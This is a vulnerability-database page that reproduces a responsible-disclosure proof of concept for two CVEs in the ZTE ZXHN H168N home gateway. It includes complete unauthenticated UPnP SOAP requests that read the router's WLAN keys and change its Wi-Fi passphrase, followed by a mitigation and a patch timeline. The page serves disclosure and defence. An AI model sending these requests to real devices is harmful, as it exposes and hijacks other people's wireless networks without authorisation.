Vulners
Lucene search
ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability | 11 Dec 201800:00 | – | zdt |
 | CVE-2018-7357 | 11 Dec 201800:00 | – | circl |
| CVE-2018-7358 | 11 Dec 201800:00 | – | circl |
 | CVE-2018-7357 | 14 Nov 201815:00 | – | cve |
| CVE-2018-7358 | 14 Nov 201815:00 | – | cve |
 | CVE-2018-7357 | 14 Nov 201815:00 | – | cvelist |
| CVE-2018-7358 | 14 Nov 201815:00 | – | cvelist |
 | ZTE ZXHN H168N - Improper Access Restrictions | 11 Dec 201800:00 | – | exploitdb |
 | ZTE ZXHN H168N - Improper Access Restrictions | 11 Dec 201800:00 | – | exploitpack |
 | CVE-2018-7357 | 14 Nov 201815:29 | – | nvd |
10
`[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE- 2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Dec 2018 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.38063